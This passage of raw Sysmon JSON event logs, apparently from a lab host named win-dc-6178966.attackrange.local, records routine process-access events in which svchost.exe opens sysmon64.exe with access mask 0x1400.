07:53:24.364","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1530,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.364\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.364","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1531,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.364\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.364","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1532,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.364\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.364","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1533,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.366\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.366","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1534,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.366\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.366","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1535,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.366\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.366","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1536,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.366\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.366","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1537,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.366\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 